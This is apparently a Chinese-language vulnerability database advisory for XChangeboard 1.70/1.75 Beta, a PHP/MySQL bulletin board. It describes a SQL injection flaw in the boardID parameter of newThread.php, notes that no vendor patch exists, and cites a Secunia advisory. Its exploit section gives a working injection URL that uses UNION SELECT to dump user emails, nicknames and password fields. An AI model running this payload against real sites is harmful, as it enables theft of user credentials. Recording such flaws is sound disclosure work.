添加时间:
2008-10-04

系统编号:
WAVDB-01192
BUGTRAQ: 30059

影响版本:
XChangeboard 1.70/1.75 Beta

程序介绍:

Xchangeboard是基于PHP和MySQL的公告牌解决方案。

漏洞分析:

Xchangeboard的newThread.php文件中没有正确地验证对boardID参数的输入便在SQL查询中使用，这允许远程攻击者通过提交恶意的查询请求执行SQL注入攻击。

漏洞利用:

http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*

解决方案:
厂商补丁：
Henrik Brinkmann
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.xchangeboard.de/

信息来源:
<*来源：haZl0oh
链接：http://secunia.com/advisories/30919/
*>